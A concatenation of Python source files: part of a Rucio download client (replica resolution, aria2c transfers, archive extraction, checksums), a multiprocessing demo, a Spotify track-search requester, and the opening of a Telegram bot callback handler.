'dataset': item.get('dataset_name', ''),
'protocol': 'https',
'remoteSite': '',
'filesize': item.get('bytes', None),
'transferStart': time.time(),
'transferEnd': time.time()}
trace.update(self.trace_tpl)
trace.update(trace_custom_fields)
# get pfns from all replicas
pfns = []
for src in item['sources']:
pfn = src['pfn']
if pfn[0:4].lower() == 'davs':
pfn = pfn.replace('davs', 'https', 1)
pfns.append(pfn)
pfn_to_rse[pfn] = src['rse']
# does file exist and are sources available?
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
if os.path.isfile(dest_file_path):
logger(logging.INFO, 'File exists already locally: %s' % file_did_str)
item['clientState'] = 'ALREADY_DONE'
trace['clientState'] = 'ALREADY_DONE'
self._send_trace(trace)
elif len(pfns) == 0:
logger(logging.WARNING, 'No available source found for file: %s' % file_did_str)
item['clientState'] = 'FILE_NOT_FOUND'
trace['clientState'] = 'FILE_NOT_FOUND'
self._send_trace(trace)
else:
item['trace'] = trace
options = {'dir': os.path.dirname(dest_file_path),
'out': os.path.basename(item['temp_file_path'])}
gid = aria_rpc.aria2.addUri(rpc_auth, pfns, options)
gid_to_item[gid] = item
num_queued += 1
logger(logging.DEBUG, 'Queued file: %s' % file_did_str)
# get some statistics
aria_stat = aria_rpc.aria2.getGlobalStat(rpc_auth)
num_active = int(aria_stat['numActive'])
num_waiting = int(aria_stat['numWaiting'])
num_stopped = int(aria_stat['numStoppedTotal'])
# save start time if one of the active downloads has started
active = aria_rpc.aria2.tellActive(rpc_auth, ['gid', 'completedLength'])
for dlinfo in active:
gid = dlinfo['gid']
if int(dlinfo['completedLength']) > 0:
gid_to_item[gid].setdefault('transferStart', time.time())
stopped = aria_rpc.aria2.tellStopped(rpc_auth, -1, num_stopped, ['gid', 'status', 'files'])
for dlinfo in stopped:
gid = dlinfo['gid']
item = gid_to_item[gid]
file_scope = item['scope']
file_name = item['name']
file_did_str = '%s:%s' % (file_scope, file_name)
temp_file_path = item['temp_file_path']
# workaround: only consider first dest file path for aria2c download
dest_file_path = next(iter(item['dest_file_paths']))
# ensure we didnt miss the active state (e.g. a very fast download)
start_time = item.setdefault('transferStart', time.time())
end_time = item.setdefault('transferEnd', time.time())
# get used pfn for traces
trace = item['trace']
for uri in dlinfo['files'][0]['uris']:
if uri['status'].lower() == 'used':
trace['remoteSite'] = pfn_to_rse.get(uri['uri'], '')
trace['transferStart'] = start_time
trace['transferEnd'] = end_time
# ensure file exists
status = dlinfo.get('status', '').lower()
if status == 'complete' and os.path.isfile(temp_file_path):
# checksum check
skip_check = item.get('ignore_checksum', False)
rucio_checksum = 0 if skip_check else item.get('adler32')
local_checksum = 0 if skip_check else adler32(temp_file_path)
if str(rucio_checksum).lstrip('0') == str(local_checksum).lstrip('0'):
item['clientState'] = 'DONE'
trace['clientState'] = 'DONE'
# remove .part ending
os.rename(temp_file_path, dest_file_path)
# calculate duration
duration = round(end_time - start_time, 2)
duration = max(duration, 0.01) # protect against 0 division
size = item.get('bytes', 0)
rate = round((size / duration) * 1e-6, 2)
size_str = sizefmt(size, self.is_human_readable)
logger(logging.INFO, 'File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
size_str,
duration,
rate))
else:
os.unlink(temp_file_path)
logger(logging.WARNING, 'Checksum validation failed for file: %s' % file_did_str)
logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
item['clientState'] = 'FAIL_VALIDATE'
trace['clientState'] = 'FAIL_VALIDATE'
else:
logger(logging.ERROR, 'Failed to download file: %s' % file_did_str)
logger(logging.DEBUG, 'Aria2c status: %s' % status)
item['clientState'] = 'FAILED'
trace['clientState'] = 'DOWNLOAD_ATTEMPT'
self._send_trace(trace)
del item['trace']
aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
del gid_to_item[gid]
if len(stopped) > 0:
logger(logging.INFO, 'Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))
return items
def _resolve_one_item_dids(self, item):
"""
Resolve scopes or wildcard DIDs to lists of full did names:
:param item: One input item
"""
dids = item.get('did')
filters = item.get('filters', {})
if filters:
filters = copy.copy(filters)
if dids is None:
self.logger(logging.DEBUG, 'Resolving DIDs by using filter options')
scope = filters.pop('scope')
for did in self.client.list_dids(scope, filters=filters, did_type='all', long=True):
yield did
return
if not isinstance(dids, list):
dids = [dids]
for did_str in dids:
scope, did_name = self._split_did_str(did_str)
filters['name'] = did_name
any_did_resolved = False
for did in self.client.list_dids(scope, filters=filters, did_type='all', long=True):
yield did
any_did_resolved = True
# Maintain compatibility with existing code, which expects non-existing DIDs be
# passed through in order to correctly set trace state to FILE_NOT_FOUND
if not any_did_resolved and '*' not in did_name:
yield {'scope': scope, 'name': did_name}
def _resolve_and_merge_input_items(self, input_items):
"""
This function takes the input items given to download_dids etc.
and resolves the sources.
- It first performs a list_dids call to dereference any wildcards and
retrieve DID stats (size, length, type).
- Next, input items are grouped together by common list_replicas options.
For each group, a single list_replicas call is performed.
- The resolved File DIDs with sources are finally mapped back to initial
input items to be able to correctly retrieve download options
(timeout, destination directories, etc)
:param input_items: List of dictionaries. Each dictionary describing an input item
:returns: a tuple:
- a dictionary that maps the dereferenced(w/o wildcards) input DIDs to a list of input items
- and a list with a dictionary for each file DID which has to be downloaded
:raises InputValidationError: if one of the input items is in the wrong format
"""
logger = self.logger
# check mandatory options before doing any server calls
resolve_archives = False
for item in input_items:
if item.get('resolve_archives') is not None:
logger(logging.WARNING, 'resolve_archives option is deprecated and will be removed in a future release.')
item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))
# If any item needs to resolve archives
if not item.get('no_resolve_archives'):
resolve_archives = True
if not item.get('did'):
if not item.get('filters', {}).get('scope'):
logger(logging.DEBUG, item)
raise InputValidationError('Item without did and filter/scope')
if resolve_archives:
# perhaps we'll need an extraction tool so check what is installed
self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()]
if len(self.extraction_tools) < 1:
logger(logging.WARNING, 'Archive resolution is enabled but no extraction tool is available. '
'Sources whose protocol doesnt support extraction wont be considered for download.')
# if excluding tapes, we need to list them first
tape_rses = []
if self.is_tape_excluded:
try:
tape_rses = [endp['rse'] for endp in self.client.list_rses(rse_expression='istape=true')]
except:
logger(logging.DEBUG, 'No tapes found.')
# Matches each dereferenced DID back to a list of input items
did_to_input_items = {}
# Resolve DIDs
for item in input_items:
resolved_dids = list(self._resolve_one_item_dids(item))
if not resolved_dids:
logger(logging.WARNING, 'An item didnt have any DIDs after resolving the input: %s.' % item.get('did', item))
item['dids'] = resolved_dids
for did in resolved_dids:
did_to_input_items.setdefault(DIDType(did), []).append(item)
if 'length' in did and not did['length']:
did_with_size = self.client.get_did(scope=did['scope'], name=did['name'], dynamic=True)
did['length'] = did_with_size['length']
did['bytes'] = did_with_size['bytes']
# group input items by common options to reduce the number of calls to list_replicas
distinct_keys = ['rse', 'force_scheme', 'no_resolve_archives']
item_groups = []
for item in input_items:
found_compatible_group = False
if not item.get('nrandom'):
# Don't merge items if nrandom is set. Otherwise two items with the same nrandom will be merged into one
# and we'll effectively download only half of the desired replicas for each item.
for item_group in item_groups:
if all(item.get(k) == item_group[0].get(k) for k in distinct_keys):
item_group.append(item)
found_compatible_group = True
break
if not found_compatible_group:
item_groups.append([item])
# List replicas for dids
merged_items_with_sources = []
for item_group in item_groups:
# Take configuration from the first item in the group; but dids from all items
item = item_group[0]
input_dids = {DIDType(did): did
for item in item_group
for did in item.get('dids')}
# since we're using metalink we need to explicitly give all schemes
schemes = item.get('force_scheme')
if schemes:
schemes = schemes if isinstance(schemes, list) else [schemes]
logger(logging.DEBUG, 'schemes: %s' % schemes)
# RSE expression, still with tape endpoints included
rse_expression = item.get('rse')
logger(logging.DEBUG, 'rse_expression: %s' % rse_expression)
# obtaining the choice of Implementation
impl = item.get('impl')
if impl:
impl_split = impl.split('.')
if len(impl_split) == 1:
impl = 'rucio.rse.protocols.' + impl + '.Default'
else:
impl = 'rucio.rse.protocols.' + impl
logger(logging.DEBUG, 'impl: %s' % impl)
# get PFNs of files and datasets
logger(logging.DEBUG, 'num DIDs for list_replicas call: %d' % len(item['dids']))
nrandom = item.get('nrandom')
if nrandom:
logger(logging.INFO, 'Selecting %d random replicas from DID(s): %s' % (nrandom, [str(did) for did in input_dids]))
metalink_str = self.client.list_replicas([{'scope': did.scope, 'name': did.name} for did in input_dids],
schemes=schemes,
ignore_availability=False,
rse_expression=rse_expression,
client_location=self.client_location,
resolve_archives=not item.get('no_resolve_archives'),
resolve_parents=True,
nrandom=nrandom,
metalink=True)
file_items = parse_replicas_from_string(metalink_str)
for file in file_items:
if impl:
file['impl'] = impl
elif not item.get('force_scheme'):
file['impl'] = self.preferred_impl(file['sources'])
logger(logging.DEBUG, 'num resolved files: %s' % len(file_items))
if not nrandom or nrandom != len(file_items):
# If list_replicas didn't resolve any file DIDs for any input did, we pass through the input DID.
# This is done to keep compatibility with later code which generates "FILE_NOT_FOUND" traces
# and output items.
# In the special case of nrandom, when serverside filtering is applied, it's "normal" for some input
# dids to be ignored as long as we got exactly nrandom file_items from the server.
for input_did in input_dids:
if not any([input_did == f['did'] or str(input_did) in f['parent_dids'] for f in file_items]):
logger(logging.ERROR, 'DID does not exist: %s' % input_did)
# TODO: store did directly as DIDType object
file_items.append({'did': str(input_did), 'adler32': None, 'md5': None, 'sources': [], 'parent_dids': set(), 'impl': impl or None})
# filtering out tape sources
if self.is_tape_excluded:
for file_item in file_items:
unfiltered_sources = copy.copy(file_item['sources'])
for src in unfiltered_sources:
if src['rse'] in tape_rses:
file_item['sources'].remove(src)
if unfiltered_sources and not file_item['sources']:
logger(logging.WARNING, 'The requested DID {} only has replicas on tape. Direct download from tape is prohibited. '
'Please request a transfer to a non-tape endpoint.'.format(file_item['did']))
# Match the file did back to the dids which were provided to list_replicas.
# Later, this will allow to match the file back to input_items via did_to_input_items
for file_item in file_items:
file_did = DIDType(file_item['did'])
file_input_dids = {DIDType(did) for did in file_item.get('parent_dids', [])}.intersection(input_dids)
if file_did in input_dids:
file_input_dids.add(file_did)
file_item['input_dids'] = {did: input_dids[did] for did in file_input_dids}
merged_items_with_sources.extend(file_items)
return did_to_input_items, merged_items_with_sources
def _options_from_input_items(self, input_items):
"""
Best-effort generation of download options from multiple input items which resolve to the same file DID.
This is done to download each file DID only once, even if it is requested multiple times via overlapping
datasets and/or wildcard resolutions in distinct input items.
Some options can be easily merged. For example: multiple base_dir are all appended to a list. As a result,
the file is downloaded once and copied to all desired destinations.
Other options are not necessarily compatible. For example, two items requesting two different values for
download timeout. We make our best to merge the options in such cases.
"""
options = {}
for item in input_items:
base_dir = item.get('base_dir', '.')
no_subdir = item.get('no_subdir', False)
new_transfer_timeout = item.get('transfer_timeout', None)
new_transfer_speed_timeout = item.get('transfer_speed_timeout', None)
options.setdefault('destinations', set()).add((base_dir, no_subdir))
# Merge some options
# The other options of this DID will be inherited from the first item that contained the DID
options['ignore_checksum'] = options.get('ignore_checksum') or item.get('ignore_checksum', False)
options['check_local_with_filesize_only'] = options.get('check_local_with_filesize_only') or item.get('check_local_with_filesize_only', False)
# if one item wants to resolve archives we enable it for all items
options['resolve_archives'] = (options.get('resolve_archives') or not item.get('no_resolve_archives'))
cur_transfer_timeout = options.setdefault('transfer_timeout', None)
if cur_transfer_timeout is not None and new_transfer_timeout is not None:
options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
elif new_transfer_timeout is not None:
options['transfer_timeout'] = int(new_transfer_timeout)
cur_transfer_speed_timeout = options.setdefault('transfer_speed_timeout', None)
if cur_transfer_speed_timeout is not None and new_transfer_speed_timeout is not None:
options['transfer_speed_timeout'] = min(float(cur_transfer_speed_timeout), float(new_transfer_speed_timeout))
elif new_transfer_speed_timeout is not None:
options['transfer_speed_timeout'] = float(new_transfer_speed_timeout)
return options
def _prepare_items_for_download(self, did_to_input_items, file_items):
"""
Optimises the amount of files to download
(This function is meant to be used as class internal only)
:param did_to_input_items: dictionary that maps resolved input DIDs to input items
:param file_items: list of dictionaries. Each dictionary describes a File DID to download
:returns: list of dictionaries. Each dictionary describes an element to download
:raises InputValidationError: if the given input is not valid or incomplete
"""
logger = self.logger
# maps file item IDs (fiid) to the file item object
fiid_to_file_item = {}
# cea -> client_extract archives to avoid confusion with archives that dont need explicit extraction
# this dict will contain all ids of cea's that definitely will be downloaded
cea_id_pure_to_fiids = {}
# this dict will contain ids of cea's that have higher prioritised non cea sources
cea_id_mixed_to_fiids = {}
all_dest_file_paths = set()
# get replicas for every file of the given dids
for file_item in file_items:
file_did = DIDType(file_item['did'])
input_items = list(itertools.chain.from_iterable(did_to_input_items.get(did, []) for did in file_item['input_dids']))
options = self._options_from_input_items(input_items)
file_item['scope'] = file_did.scope
file_item['name'] = file_did.name
logger(logging.DEBUG, 'Queueing file: %s' % file_did)
logger(logging.DEBUG, 'real parents: %s' % [str(did) for did in file_item['input_dids'] if did != file_did])
logger(logging.DEBUG, 'options: %s' % options)
# prepare destinations folders:
dest_file_paths = file_item.get('dest_file_paths', set())
for input_did in file_item['input_dids']:
for item in did_to_input_items[input_did]:
base_dir = item.get('base_dir', '.')
no_subdir = item.get('no_subdir', False)
file_did_path = file_did.name
if input_did != file_did:
# if datasets were given: prepare the destination paths for each dataset
if self.extract_scope_convention == 'belleii' and file_did_path.startswith('/'):
file_did_path = file_did_path.split('/')[-1]
path = os.path.join(self._prepare_dest_dir(base_dir, input_did.name, no_subdir), file_did_path)
else:
# if no datasets were given only prepare the given destination paths
if file_did_path.startswith('/'):
file_did_path = file_did_path[1:]
path = os.path.join(self._prepare_dest_dir(base_dir, file_did.scope, no_subdir), file_did_path)
if path in all_dest_file_paths:
raise RucioException("Multiple file items with same destination file path")
all_dest_file_paths.add(path)
dest_file_paths.add(path)
# workaround: just take any given dataset for the traces and the output
file_item.setdefault('dataset_scope', input_did.scope)
file_item.setdefault('dataset_name', input_did.name)
if not options:
continue
resolve_archives = options.get('resolve_archives')
file_item['merged_options'] = options
file_item['dest_file_paths'] = list(dest_file_paths)
file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]
# the file did str ist not an unique key for this dict because multiple calls of list_replicas
# could result in the same DID multiple times. So we're using the id of the dictionary objects
fiid = id(file_item)
fiid_to_file_item[fiid] = file_item
if resolve_archives:
min_cea_priority = None
num_non_cea_sources = 0
cea_ids = []
sources = []
# go through sources and check how many (non-)cea sources there are,
# index cea sources, or remove cea sources if there is no extraction tool
for source in file_item['sources']:
is_cea = source.get('client_extract', False)
if is_cea and (len(self.extraction_tools) > 0):
priority = int(source['priority'])
if min_cea_priority is None or priority < min_cea_priority:
min_cea_priority = priority
# workaround since we dont have the archive DID use the part behind the last slash of the PFN
# this doesn't respect the scope of the archive DID!!!
# and we trust that client_extract==True sources dont have any parameters at the end of the PFN
cea_id = source['pfn'].split('/')
cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
cea_ids.append(cea_id)
sources.append(source)
elif not is_cea:
num_non_cea_sources += 1
sources.append(source)
else:
# no extraction tool
logger(logging.DEBUG, 'client_extract=True; ignoring source: %s' % source['pfn'])
logger(logging.DEBUG, 'Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
% (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))
file_item['sources'] = sources
# if there are no cea sources we are done for this item
if min_cea_priority is None:
continue
# decide if file item belongs to the pure or mixed map
# if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
elif num_non_cea_sources == 0 or min_cea_priority == 1:
logger(logging.DEBUG, 'Adding fiid to cea pure map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_pure', set()).add(cea_id)
# if there are non-archive sources and archive sources we put it in the mixed map
elif len(cea_ids) > 0:
logger(logging.DEBUG, 'Adding fiid to cea mixed map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_mixed', set()).add(cea_id)
# put all archives from the mixed list into the pure list if they meet
# certain conditions, e.g., an archive that is already in the pure list
for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
if cea_id_mixed in cea_id_pure_to_fiids:
# file from mixed list is already in a pure list
logger(logging.DEBUG, 'Mixed ID is already in cea pure map: '
'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
% (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
elif len(fiids_mixed) >= self.use_cea_threshold:
# more than use_cea_threshold files are in a common archive
logger(logging.DEBUG, 'Number of needed files in cea reached threshold: '
'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
% (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
else:
# dont move from mixed list to pure list
continue
# first add cea_id to pure map so it can be removed from mixed map later
cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)
# now update all file_item mixed/pure maps
for fiid_mixed in list(fiids_mixed):
file_item = fiid_to_file_item[fiid_mixed]
# add cea id to file_item pure map
file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)
# remove file item mixed map and
# remove references from all other mixed archives to file_item
for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)
# finally remove cea_id from mixed map
cea_id_mixed_to_fiids.pop(cea_id_mixed)
for file_item in file_items:
cea_ids_pure = file_item.get('cea_ids_pure', set())
cea_ids_mixed = file_item.get('cea_ids_mixed', set())
if len(cea_ids_pure) > 0:
logger(logging.DEBUG, 'Removing all non-cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
elif len(cea_ids_mixed) > 0:
logger(logging.DEBUG, 'Removing all cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]
# reduce the amount of archives to download by removing
# all redundant pure archives (=all files can be extracted from other archives)
for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
# if all files of this archive are available in more than one archive the archive is redundant
if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
logger(logging.DEBUG, 'Removing redundant archive %s' % cea_id_pure)
cea_id_pure_to_fiids.pop(cea_id_pure)
# remove all archives of a file except a single one so
# that each file is assigned to exactly one pure archive
for cea_id_pure in cea_id_pure_to_fiids:
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']
for cea_id_pure_other in list(cea_ids_pure):
if cea_id_pure != cea_id_pure_other:
cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
cea_ids_pure.discard(cea_id_pure_other)
download_packs = []
cea_id_to_pack = {}
for file_item in file_items:
cea_ids = file_item.get('cea_ids_pure', set())
if len(cea_ids) > 0:
cea_id = next(iter(cea_ids))
pack = cea_id_to_pack.get(cea_id)
if pack is None:
scope = file_item['scope']
first_dest = next(iter(file_item['merged_options']['destinations']))
dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, first_dest[1]), cea_id)
pack = {'scope': scope,
'name': cea_id,
'dest_file_paths': [dest_path],
'temp_file_path': '%s.part' % dest_path,
'sources': file_item['sources'],
'merged_options': {'ignore_checksum': True}, # we currently dont have checksums for the archive
'archive_items': []
}
cea_id_to_pack[cea_id] = pack
download_packs.append(pack)
file_item.pop('sources')
pack['archive_items'].append(file_item)
else:
download_packs.append(file_item)
return download_packs
def _split_did_str(self, did_str):
"""
Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part
(This function is meant to be used as class internal only)
:param did_str: the DID string that will be splitted
:returns: the scope- and name part of the given DID
:raises InputValidationError: if the given DID string is not valid
"""
did = did_str.split(':')
if len(did) == 2:
did_scope = did[0]
did_name = did[1]
elif len(did) == 1:
if self.extract_scope_convention == 'belleii':
scopes = [scope for scope in self.client.list_scopes()]
did_scope, did_name = extract_scope(did[0], scopes)
else:
did = did_str.split('.')
did_scope = did[0]
if did_scope == 'user' or did_scope == 'group':
did_scope = '%s.%s' % (did[0], did[1])
did_name = did_str
else:
raise InputValidationError('%s is not a valid DID. To many colons.' % did_str)
if did_name.endswith('/'):
did_name = did_name[:-1]
return did_scope, did_name
def _prepare_dest_dir(self, base_dir, dest_dir_name, no_subdir):
"""
Builds the final destination path for a file and creates the
destination directory if it's not existent.
(This function is meant to be used as class internal only)
:param base_dir: base directory part
:param dest_dir_name: name of the destination directory
:param no_subdir: if no subdirectory should be created
:returns: the absolut path of the destination directory
"""
# append dest_dir_name, if subdir should be used
if dest_dir_name.startswith('/'):
dest_dir_name = dest_dir_name[1:]
dest_dir_path = os.path.join(os.path.abspath(base_dir), '' if no_subdir else dest_dir_name)
if not os.path.isdir(dest_dir_path):
os.makedirs(dest_dir_path)
return dest_dir_path
def _check_output(self, output_items, deactivate_file_download_exceptions=False):
"""
Checks if all files were successfully downloaded
(This function is meant to be used as class internal only)
:param output_items: list of dictionaries describing the downloaded files
:param deactivate_file_download_exceptions: Boolean, if file download exceptions shouldn't be raised
:returns: output_items list
:raises NoFilesDownloaded:
:raises NotAllFilesDownloaded:
"""
success_states = ['ALREADY_DONE', 'DONE', 'FOUND_IN_PCACHE']
# failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED']
num_successful = 0
num_failed = 0
for item in output_items:
clientState = item.get('clientState', 'FAILED')
if clientState in success_states:
num_successful += 1
else:
num_failed += 1
if not deactivate_file_download_exceptions and num_successful == 0:
raise NoFilesDownloaded()
elif not deactivate_file_download_exceptions and num_failed > 0:
raise NotAllFilesDownloaded()
return output_items
def _send_trace(self, trace):
"""
Checks if sending trace is allowed and send the trace.
:param trace: the trace
"""
if self.tracing:
send_trace(trace, self.client.trace_host, self.client.user_agent)
def preferred_impl(self, sources):
"""
Finds the optimum protocol impl preferred by the client and
supported by the remote RSE.
:param sources: List of sources for a given DID
:raises RucioException(msg): general exception with msg for more details.
"""
preferred_protocols = []
checked_rses = []
supported_impl = None
try:
preferred_impls = config_get('download', 'preferred_impl')
except Exception as error:
self.logger(logging.INFO, 'No preferred protocol impl in rucio.cfg: %s' % (error))
return supported_impl
else:
preferred_impls = list(preferred_impls.split(', '))
i = 0
while i < len(preferred_impls):
impl = preferred_impls[i]
impl_split = impl.split('.')
if len(impl_split) == 1:
preferred_impls[i] = 'rucio.rse.protocols.' + impl + '.Default'
else:
preferred_impls[i] = 'rucio.rse.protocols.' + impl
i += 1
for source in sources:
if source['rse'] in checked_rses:
continue
try:
rse_settings = rsemgr.get_rse_info(source['rse'], vo=self.client.vo)
checked_rses.append(str(source['rse']))
except RucioException as error:
self.logger(logging.DEBUG, 'Could not get info of RSE %s: %s' % (source['source'], error))
continue
preferred_protocols = [protocol for protocol in reversed(rse_settings['protocols']) if protocol['impl'] in preferred_impls]
if len(preferred_protocols) == 0:
continue
for protocol in preferred_protocols:
if not protocol['domains']['wan'].get("read"):
self.logger(logging.WARNING, 'Unsuitable protocol "%s": "WAN Read" operation is not supported' % (protocol['impl']))
continue
try:
supported_protocol = rsemgr.create_protocol(rse_settings, 'read', impl=protocol['impl'], auth_token=self.auth_token, logger=self.logger)
supported_protocol.connect()
except Exception as error:
self.logger(logging.WARNING, 'Failed to create protocol "%s", exception: %s' % (protocol['impl'], error))
pass
else:
self.logger(logging.INFO, 'Preferred protocol impl supported locally and remotely: %s' % (protocol['impl']))
supported_impl = protocol['impl']
break
return supported_impl
def _verify_checksum(item, path):
rucio_checksum = item.get(PREFERRED_CHECKSUM)
local_checksum = None
checksum_algo = CHECKSUM_ALGO_DICT.get(PREFERRED_CHECKSUM)
if rucio_checksum and checksum_algo:
local_checksum = checksum_algo(path)
return rucio_checksum == local_checksum, rucio_checksum, local_checksum
for checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS:
rucio_checksum = item.get(checksum_name)
checksum_algo = CHECKSUM_ALGO_DICT.get(checksum_name)
if rucio_checksum and checksum_algo:
local_checksum = checksum_algo(path)
return rucio_checksum == local_checksum, rucio_checksum, local_checksum
return False, None, None
|
ProcessDemo.py
|
import os
from multiprocessing import Process
def create_thread_for_windows(name):
print('child process %s (%s) Running...' % (name, os.getpid()))
def create_thread_for_unix():
pid = os.fork() # 使用与 unix 和了Linux 系统
if pid < 0:
print('error fork')
elif pid == 0:
print('I am child process (%s) and my parent process is (%s)', (os.getpid(), os.getppid()))
else:
print('I (%s) created a child process (%s).', os.getpid(), pid)
if __name__ == '__main__':
print('current process (%s) start ...' % (os.getpid()))
# create_thread_for_unix()
for i in range(5):
p = Process(target=create_thread_for_windows, args=(str(i),))
print('Process will start.')
p.start()
p.join()
print('Process end...')
|
requester.py
|
import base64
import json
import os
from threading import Thread
from time import sleep
import dpath
import requests
from requests import RequestException
from spotify_my_words.exceptions import GeneralError
SPOTIFY_TOKEN_URL = 'https://accounts.spotify.com/api/token'
SPOTIFY_SEARCH_URL = 'https://api.spotify.com/v1/search'
HTTP_SUCCESS = 200
TIMEOUT_ERROR = 429
def request_from_spotify(cleaned, total_items):
# Yes using global is completely disgusting and wrong, but in the interests of this short
# exercise, turning the whole thing into a class might be a bit overkill. Don't hate me.
# This is a simple list so that multiple threads have somewhere to write to in at a specific
# index to maintain order.
global playlist
playlist = ['' for _ in range(total_items)]
headers = {'Authorization': f'Bearer {_get_token()}'}
threads = []
for token, metadata in cleaned.items():
request_params = {
'q': f'{token}',
'type': 'track',
'offset': 0,
'limit': 1,
}
thread = Thread(
target=_parse_track_metadata, args=(headers, request_params, metadata, token))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return json.dumps(playlist)
def _get_token():
headers = {'Authorization': f'Basic {_encode_secrets()}'}
body = {'grant_type': 'client_credentials'}
try:
token_response = _post_to_spotify(SPOTIFY_TOKEN_URL, headers, body)
except GeneralError:
raise
else:
return json.loads(token_response.text).get('access_token')
def _encode_secrets():
client_id = os.environ.get('CLIENT_ID')
client_secret = os.environ.get('CLIENT_SECRET')
return base64.b64encode(bytes(f'{client_id}:{client_secret}', encoding='utf-8')).decode('utf-8')
def _parse_track_metadata(track_header, request_params, metadata, token):
names = []
artists = []
while len(names) < metadata.get('limit'):
try:
name, artist = _get_track_metadata(SPOTIFY_SEARCH_URL, track_header, request_params)
except TimeoutError as err:
time_out, *_ = err.args
sleep(time_out)
else:
request_params['offset'] += 1
if name.lower().startswith(token) and name not in names:
names.append(name)
artists.append(artist)
for this_index, full_index in enumerate(metadata.get('indices')):
track_details = f'{names[this_index]} - {artists[this_index]}'
playlist[full_index] = track_details
return True
def _get_track_metadata(url, track_header, request_params):
try:
response = json.loads(_get_from_spotify(url, track_header, request_params).text)
except (GeneralError, TimeoutError):
raise
else:
items = response.get('tracks').get('items')
name = dpath.get(items, '*/name')
artists = dpath.values(items, '*/artists/*/name')
artists = ', '.join(artists) if len(artists) > 1 else str(next(iter(artists)))
return name, artists
def _post_to_spotify(url, headers, data):
try:
response = requests.post(url, headers=headers, data=data, verify=True)
if response.status_code != HTTP_SUCCESS:
raise RequestException
except RequestException as exc:
raise GeneralError(f'Unable to send information to API: {exc}')
else:
return response
def _get_from_spotify(url, headers, params):
try:
response = requests.get(url, headers=headers, params=params, verify=True)
if response.status_code == TIMEOUT_ERROR:
sleep_time = int(response.headers._store.get('retry-after')[1])
raise TimeoutError(sleep_time)
if response.status_code != HTTP_SUCCESS:
raise RequestException
except RequestException as exc:
raise GeneralError(f'Unable to get information from API: {exc}')
else:
return response
|
callback.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo,GPranks,IDrank
from utlis.send import send_msg, BYusers, Sendto, fwdto,Name,Glang,getAge
from utlis.locks import st,getOR,Clang,st_res
from utlis.tg import Bot
from config import *
from pyrogram.types import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json,datetime,os
import importlib
from os import listdir
from os.path import isfile, join
def updateCallback(client, callback_query,redis):
try:
json.loads(callback_query.data)
except Exception as e:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
if callback_query.inline_message_id:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
userID = callback_query.from_user.id
chatID = callback_query.message.chat.id
userFN = callback_query.from_user.first_name
title = callback_query.message.chat.title
